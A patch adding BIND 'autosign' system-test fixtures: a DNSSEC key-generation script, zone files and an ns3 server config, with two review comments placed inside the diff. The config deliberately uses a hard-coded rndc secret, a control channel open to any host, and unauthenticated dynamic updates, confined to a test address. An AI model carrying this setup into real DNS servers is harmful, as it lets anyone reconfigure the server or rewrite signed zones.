+# OPTOUT/NSEC3 test zone
+#
+setup optout.nsec3.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# A nsec3 zone (non-optout).
+#
+setup nsec3.example
+cat $infile dsset-*.${zone}$TP > $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# An NSEC3 zone, with NSEC3 parameters set prior to signing
+#
+setup autonsec3.example
+cat $infile > $zonefile
+ksk=$($KEYGEN -G -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+echo $ksk > ../autoksk.key
+zsk=$($KEYGEN -G -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out
+echo $zsk > ../autozsk.key
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# OPTOUT/NSEC test zone
+#
+setup secure.optout.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# OPTOUT/NSEC3 test zone
+#
+setup nsec3.optout.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# OPTOUT/OPTOUT test zone
+#
+setup optout.optout.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# A optout nsec3 zone.
+#
+setup optout.example
+cat $infile dsset-*.${zone}$TP > $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# A RSASHA256 zone.
+#
+setup rsasha256.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a RSASHA256 -b 2048 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a RSASHA256 -b 2048 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# A RSASHA512 zone.
+#
+setup rsasha512.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a RSASHA512 -b 2048 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a RSASHA512 -b 2048 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# NSEC-only zone. A zone using NSEC-only DNSSEC algorithms.
+# None of these algorithms are supported for signing in FIPS mode
+# as they are MD5 and SHA1 based.
+#
+if (cd ..; SYSTEMTESTTOP=.. $SHELL ../testcrypto.sh -q RSASHA1)
+then
+ setup nsec-only.example
+ cp $infile $zonefile
+ ksk=$($KEYGEN -q -a RSASHA1 -fk $zone 2> kg.out) || dumpit kg.out
+ $KEYGEN -q -a RSASHA1 $zone > kg.out 2>&1 || dumpit kg.out
+ $DSFROMKEY $ksk.key > dsset-${zone}$TP
+else
+ echo_i "skip: nsec-only.example - signing with RSASHA1 not supported"
+fi
+
+#
+# Signature refresh test zone. Signatures are set to expire long
+# in the past; they should be updated by autosign.
+#
+setup oldsigs.example
+cp $infile $zonefile
+count=1
+while [ $count -le 1000 ]
+do
+ echo "label${count} IN TXT label${count}" >> $zonefile
+ count=$((count + 1))
+done
+$KEYGEN -q -a $DEFAULT_ALGORITHM -fk $zone > kg.out 2>&1 || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM $zone > kg.out 2>&1 || dumpit kg.out
+$SIGNER -PS -s now-1y -e now-6mo -o $zone -f $zonefile.signed $zonefile > s.out || dumpit s.out
+mv $zonefile.signed $zonefile
+
+#
+# NSEC3->NSEC transition test zone.
+#
+setup nsec3-to-nsec.example
+$KEYGEN -q -a $DEFAULT_ALGORITHM -fk $zone > kg.out 2>&1 || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM $zone > kg.out 2>&1 || dumpit kg.out
+$SIGNER -S -3 beef -A -o $zone -f $zonefile $infile > s.out || dumpit s.out
+
+#
+# secure-to-insecure transition test zone; used to test removal of
+# keys via nsupdate
+#
+setup secure-to-insecure.example
+$KEYGEN -a $DEFAULT_ALGORITHM -q -fk $zone > kg.out 2>&1 || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -q $zone > kg.out 2>&1 || dumpit kg.out
+$SIGNER -S -o $zone -f $zonefile $infile > s.out || dumpit s.out
+
+#
+# another secure-to-insecure transition test zone; used to test
+# removal of keys on schedule.
+#
+setup secure-to-insecure2.example
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+echo $ksk > ../del1.key
+zsk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out
+echo $zsk > ../del2.key
+$SIGNER -S -3 beef -o $zone -f $zonefile $infile > s.out || dumpit s.out
+
+#
+# Introducing a pre-published key test.
+#
+setup prepub.example
+infile="secure-to-insecure2.example.db.in"
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone > kg.out 2>&1 || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out
+$SIGNER -S -3 beef -o $zone -f $zonefile $infile > s.out || dumpit s.out
+
+#
+# Key TTL tests.
+#
+
+# no default key TTL; DNSKEY should get SOA TTL
+setup ttl1.example
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone > kg.out 2>&1 || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out
+cp $infile $zonefile
+
+# default key TTL should be used
+setup ttl2.example
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk -L 60 $zone > kg.out 2>&1 || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -L 60 $zone > kg.out 2>&1 || dumpit kg.out
+cp $infile $zonefile
+
+# mismatched key TTLs, should use shortest
+setup ttl3.example
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk -L 30 $zone > kg.out 2>&1 || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -L 60 $zone > kg.out 2>&1 || dumpit kg.out
+cp $infile $zonefile
+
+# existing DNSKEY RRset, should retain TTL
+setup ttl4.example
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -L 30 -fk $zone > kg.out 2>&1 || dumpit kg.out
+cat ${infile} K${zone}.+*.key > $zonefile
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -L 180 $zone > kg.out 2>&1 || dumpit kg.out
+
+#
+# A zone with a DNSKEY RRset that is published before it's activated
+#
+setup delay.example
+ksk=$($KEYGEN -G -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+echo $ksk > ../delayksk.key
+zsk=$($KEYGEN -G -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out
+echo $zsk > ../delayzsk.key
+
+#
+# A zone with signatures that are already expired, and the private KSK
+# is missing.
+#
+setup noksk.example
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+zsk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out
+$SIGNER -S -P -s now-1mo -e now-1mi -o $zone -f $zonefile ${zonefile}.in > s.out || dumpit s.out
+echo $ksk > ../noksk-ksk.key
+rm -f ${ksk}.private
+
+#
+# A zone with signatures that are already expired, and the private ZSK
+# is missing.
+#
+setup nozsk.example
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+zsk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out
+$SIGNER -S -P -s now-1mo -e now-1mi -o $zone -f $zonefile ${zonefile}.in > s.out || dumpit s.out
+echo $ksk > ../nozsk-ksk.key
+echo $zsk > ../nozsk-zsk.key
+rm -f ${zsk}.private
+
+#
+# A zone with signatures that are already expired, and the private ZSK
+# is inactive.
+#
+setup inaczsk.example
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+zsk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone 2> kg.out) || dumpit kg.out
+$SIGNER -S -P -s now-1mo -e now-1mi -o $zone -f $zonefile ${zonefile}.in > s.out || dumpit s.out
+echo $ksk > ../inaczsk-ksk.key
+echo $zsk > ../inaczsk-zsk.key
+$SETTIME -I now $zsk > st.out 2>&1 || dumpit st.out
+
+#
+# A zone that is set to 'auto-dnssec maintain' during a reconfig
+#
+setup reconf.example
+cp secure.example.db.in $zonefile
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone > kg.out 2>&1 || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+
+#
+# A zone which generates CDS and CDNSEY RRsets automatically
+#
+setup sync.example
+cp $infile $zonefile
+ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk -P sync now $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+echo ns3/$ksk > ../sync.key
+
+#
+# A zone that generates CDS and CDNSKEY and uses dnssec-dnskey-kskonly
+#
+setup kskonly.example
+cp $infile $zonefile
+ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk -P sync now $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# A zone that has a published inactive key that is autosigned.
+#
+setup inacksk2.example
+cp $infile $zonefile
+ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -Pnow -A now+3600 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# A zone that has a published inactive key that is autosigned.
+#
+setup inaczsk2.example
+cp $infile $zonefile
+ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -P now -A now+3600 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# A zone that starts with a active KSK + ZSK and a inactive ZSK.
+#
+setup inacksk3.example
+cp $infile $zonefile
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -P now -A now+3600 -fk $zone > kg.out 2>&1 || dumpit kg.out
+ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# A zone that starts with a active KSK + ZSK and a inactive ZSK.
+#
+setup inaczsk3.example
+cp $infile $zonefile
+ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -P now -A now+3600 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# A zone that starts with an active KSK + ZSK and an inactive ZSK, with the
+# latter getting deleted during the test.
+#
+setup delzsk.example
+cp $infile $zonefile
+ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out
+zsk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -I now-1w $zone 2>kg.out) || dumpit kg.out
+echo $zsk > ../delzsk.key
+
+#
+# Check that NSEC3 are correctly signed and returned from below a DNAME
+#
+setup dname-at-apex-nsec3.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# Check that dynamically added CDS (DELETE) is kept in the zone after signing.
+#
+setup cds-delete.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# Check that dynamically added CDNSKEY (DELETE) is kept in the zone after
+# signing.
+#
+setup cdnskey-delete.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
diff --git a/bin/tests/system/autosign/ns3/kskonly.example.db.in b/bin/tests/system/autosign/ns3/kskonly.example.db.in
new file mode 100644
index 0000000..c6c7f88
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/kskonly.example.db.in
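Review bot: In ns3/keygen.sh every `$KEYGEN`, `$SIGNER` and `$SETTIME` call ends in `|| dumpit kg.out` (or `s.out` / `st.out`), and `dumpit` finishes with `cat "${1}" | cat_d`, so the list takes dumpit's exit status instead of the failed command's. `cat_d` comes from conf.sh, which this diff does not show, but if it returns 0 then a failed key-generation or signing step no longer stops the `sh -e` script, and the test would start against zones with missing keys or signatures. Ending `dumpit` with `return 1` after the dump keeps the diagnostics and still aborts setup. Two comments also need a touch-up: "CDNSEY" above `setup sync.example` should read CDNSKEY, and the comment above `setup inacksk3.example` repeats the inaczsk3 wording ("a inactive ZSK") although the delayed key there is generated with `-fk`.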
@@ -0,0 +1,34 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
+
+private NS ns.private
+ns.private A 10.53.0.2
+
+insecure NS ns.insecure
+ns.insecure A 10.53.0.2
diff --git a/bin/tests/system/autosign/ns3/named.conf.in b/bin/tests/system/autosign/ns3/named.conf.in
new file mode 100644
index 0000000..a1f1f0d
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/named.conf.in
@@ -0,0 +1,334 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ session-keyfile "session.key";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+ dnssec-loadkeys-interval 10;
+ allow-new-zones yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ file "example.bk";
+};
+
+zone "bar" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ file "bar.bk";
+};
+
+zone "secure.example" {
+ type primary;
+ file "secure.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "insecure.example" {
+ type primary;
+ file "insecure.example.db";
+};
+
+zone "nsec3.example" {
+ type primary;
+ file "nsec3.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "autonsec3.example" {
+ type primary;
+ file "autonsec3.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "optout.nsec3.example" {
+ type primary;
+ file "optout.nsec3.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "nsec3.nsec3.example" {
+ type primary;
+ file "nsec3.nsec3.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "jitter.nsec3.example" {
+ type primary;
+ file "jitter.nsec3.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+ sig-validity-interval 10 2;
+ sig-signing-nodes 1000;
+ sig-signing-signatures 100;
+};
+
+zone "secure.nsec3.example" {
+ type primary;
+ file "secure.nsec3.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "optout.example" {
+ type primary;
+ file "optout.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "secure.optout.example" {
+ type primary;
+ file "secure.optout.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "nsec3.optout.example" {
+ type primary;
+ file "nsec3.optout.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "optout.optout.example" {
+ type primary;
+ file "optout.optout.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "rsasha256.example" {
+ type primary;
+ file "rsasha256.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "rsasha512.example" {
+ type primary;
+ file "rsasha512.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "nsec-only.example" {
+ type primary;
+ file "nsec-only.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "nsec3-to-nsec.example" {
+ type primary;
+ file "nsec3-to-nsec.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "secure-to-insecure.example" {
+ type primary;
+ file "secure-to-insecure.example.db";
+ allow-update { any; };
+ dnssec-secure-to-insecure yes;
+};
+
+zone "secure-to-insecure2.example" {
+ type primary;
+ file "secure-to-insecure2.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+ dnssec-secure-to-insecure yes;
+};
+
+zone "oldsigs.example" {
+ type primary;
+ file "oldsigs.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+ sig-validity-interval 10 2;
+ sig-signing-nodes 1000;
+ sig-signing-signatures 100;
+};
+
+zone "prepub.example" {
+ type primary;
+ file "prepub.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "ttl1.example" {
+ type primary;
+ file "ttl1.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "ttl2.example" {
+ type primary;
+ file "ttl2.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "ttl3.example" {
+ type primary;
+ file "ttl3.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "ttl4.example" {
+ type primary;
+ file "ttl4.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "delay.example" {
+ type primary;
+ file "delay.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "nozsk.example" {
+ type primary;
+ file "nozsk.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "inaczsk.example" {
+ type primary;
+ file "inaczsk.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "noksk.example" {
+ type primary;
+ file "noksk.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "sync.example" {
+ type primary;
+ file "sync.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "kskonly.example" {
+ type primary;
+ file "kskonly.example.db";
+ allow-update { any; };
+ dnssec-dnskey-kskonly yes;
+ auto-dnssec maintain;
+};
+
+zone "inacksk2.example" {
+ type primary;
+ file "inacksk2.example.db";
+ allow-update { any; };
+ dnssec-dnskey-kskonly yes;
+ auto-dnssec maintain;
+};
+
+zone "inacksk3.example" {
+ type primary;
+ file "inacksk3.example.db";
+ allow-update { any; };
+ dnssec-dnskey-kskonly yes;
+ auto-dnssec maintain;
+};
+
+zone "inaczsk2.example" {
+ type primary;
+ file "inaczsk2.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "inaczsk3.example" {
+ type primary;
+ file "inaczsk3.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "delzsk.example." {
+ type primary;
+ file "delzsk.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "dname-at-apex-nsec3.example" {
+ type primary;
+ file "dname-at-apex-nsec3.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "cds-delete.example" {
+ type primary;
+ file "cds-delete.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "cdnskey-delete.example" {
+ type primary;
+ file "cdnskey-delete.example.db";
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/autosign/ns3/noksk.example.db.in b/bin/tests/system/autosign/ns3/noksk.example.db.in
new file mode 100644
index 0000000..1376922
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/noksk.example.db.in
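Review bot: ns3/named.conf.in carries no comment saying that its access controls are deliberately wide open, and that is worth stating at the top of the file. The `key rndc_key` block embeds the fixed secret `1234abcd8765`, the second `controls` statement accepts that key from `allow { any; }`, and most primary zones set `allow-update { any; };`, so anyone who can reach the listener can reconfigure the server or rewrite signed zones; this is only acceptable because the instance listens on 10.53.0.3, which appears to be a test-only address. I would add after `// NS3` a line such as `// Test fixture: fixed rndc secret, open control channel and unauthenticated dynamic updates - never reuse outside the test network.` Separately, the leading `controls { /* empty */ };` is followed later by a populated `controls` block, so the empty one reads as a leftover and could be dropped or explained.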
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/nozsk.example.db.in b/bin/tests/system/autosign/ns3/nozsk.example.db.in
new file mode 100644
index 0000000..1376922
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/nozsk.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/nsec-only.example.db.in b/bin/tests/system/autosign/ns3/nsec-only.example.db.in
new file mode 100644
index 0000000..0b11a00
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/nsec-only.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/nsec3-to-nsec.example.db.in b/bin/tests/system/autosign/ns3/nsec3-to-nsec.example.db.in
new file mode 100644
index 0000000..0b11a00
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/nsec3-to-nsec.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/nsec3.example.db.in b/bin/tests/system/autosign/ns3/nsec3.example.db.in
new file mode 100644
index 0000000..17964e8
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/nsec3.example.db.in
@@ -0,0 +1,37 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+child NS ns2.example.
+insecure NS ns.insecure
+ns.insecure A 10.53.0.3
+secure NS ns.secure
+ns.secure A 10.53.0.3
+nsec3 NS ns.nsec3
+ns.nsec3 A 10.53.0.3
+optout NS ns.optout
+ns.optout A 10.53.0.3
+02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17
diff --git a/bin/tests/system/autosign/ns3/nsec3.nsec3.example.db.in b/bin/tests/system/autosign/ns3/nsec3.nsec3.example.db.in
new file mode 100644
index 0000000..15fe621
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/nsec3.nsec3.example.db.in
